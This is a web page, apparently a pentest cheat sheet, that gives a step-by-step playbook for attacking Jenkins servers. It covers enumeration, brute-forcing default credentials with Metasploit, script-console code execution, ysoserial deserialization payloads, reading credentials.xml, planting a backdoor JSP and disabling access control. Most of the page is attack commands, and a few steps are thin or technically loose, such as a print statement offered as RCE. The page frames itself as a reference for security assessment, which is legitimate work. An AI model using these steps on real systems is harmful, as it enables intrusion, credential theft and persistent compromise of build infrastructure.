Attacking Jenkins - Focused Commands & Key Points

1. Jenkins Version Detection:

curl -I http://<target>:8080/

Check HTTP headers for Jenkins version.

nmap -sV -p 8080 <target_ip>

Nmap version detection.

curl http://<target>:8080/jenkins/cli/ | grep -i "Jenkins CLI"

Check for Jenkins CLI.

2. Jenkins Port Enumeration:

Default Ports:
- 8080 (HTTP Web Interface)
- 50000 (Slave Communication, often overlooked)

nmap -sV -p 50000 <target_ip>

Identify slave communication port.

3. Jenkins CLI Enumeration:

java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ help
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ list-plugins
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ list-jobs

Enumerate jobs, plugins, and users via Jenkins CLI.

4. Jenkins Plugin Enumeration:

curl http://<target>:8080/jenkins/pluginManager/

List installed plugins (common vulnerability source).

5. Jenkins Security Realm Enumeration:

curl http://<target>:8080/jenkins/configureSecurity/

Identify authentication methods (Jenkins DB, LDAP, etc.).

6. Jenkins API Enumeration:

curl http://<target>:8080/jenkins/api/
curl http://<target>:8080/jenkins/api/json

Identify API endpoints that might expose sensitive data.

7. Jenkins Access Control Enumeration:

curl http://<target>:8080/jenkins/configureSecurity/

Identify misconfigurations in access control settings.

8. Jenkins Exploitation:

Exploiting Weak Credentials
- Check for default credentials (admin:admin, admin:password).

msf6 > use auxiliary/scanner/http/jenkins_login
msf6 auxiliary(scanner/http/jenkins_login) > set RHOSTS <target_ip>
msf6 auxiliary(scanner/http/jenkins_login) > run

Exploiting Script Console (Authenticated RCE)

java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ groovysh
println "Attacker Shell"

Gain RCE through Jenkins script console.
Exploiting Build Job Execution

curl -X POST http://<target>:8080/jenkins/job/test/build

Trigger a job execution for exploitation.

9. Jenkins Deserialization Vulnerabilities:

Use ysoserial to generate payloads.

java -jar ysoserial-all.jar CommonsCollections5 "<payload>" | base64

Inject payloads into vulnerable endpoints.

10. Jenkins Post-Exploitation & Persistence:

Extract Credentials from credentials.xml

cat /var/lib/jenkins/credentials.xml

Establish Persistence:

cp backdoor.jsp /var/lib/jenkins/jobs/

Modify Access Control for Future Access:

jenkins.security.AuthorizationStrategy$Unsecured

Key Takeaways:

Jenkins Manager Access: RCE via Jenkins Script Console.
Weak Credentials: Default or weak credentials often present.
Plugin Enumeration: Plugins are a frequent source of vulnerabilities.
Jenkins API Exposure: Can expose sensitive information.
Access Control Issues: Misconfigurations lead to privilege escalation.
Deserialization Attacks: Exploit Java deserialization vulnerabilities.
Web Shell Persistence: Deploy malicious JSP for long-term access.

By structuring this guide effectively, it serves as a powerful reference for Jenkins security assessment and penetration testing.

Previousabuse Nextexploit

Last updated 1 day ago

hashtag1. Jenkins Version Detection:

hashtag2. Jenkins Port Enumeration:

hashtag3. Jenkins CLI Enumeration:

hashtag4. Jenkins Plugin Enumeration:

hashtag5. Jenkins Security Realm Enumeration:

hashtag6. Jenkins API Enumeration:

hashtag7. Jenkins Access Control Enumeration:

hashtag8. Jenkins Exploitation:

hashtag9. Jenkins Deserialization Vulnerabilities:

hashtag10. Jenkins Post-Exploitation & Persistence:

hashtagKey Takeaways:

1. Jenkins Version Detection:

2. Jenkins Port Enumeration:

3. Jenkins CLI Enumeration:

4. Jenkins Plugin Enumeration:

5. Jenkins Security Realm Enumeration:

6. Jenkins API Enumeration:

7. Jenkins Access Control Enumeration:

8. Jenkins Exploitation:

9. Jenkins Deserialization Vulnerabilities:

10. Jenkins Post-Exploitation & Persistence:

Key Takeaways: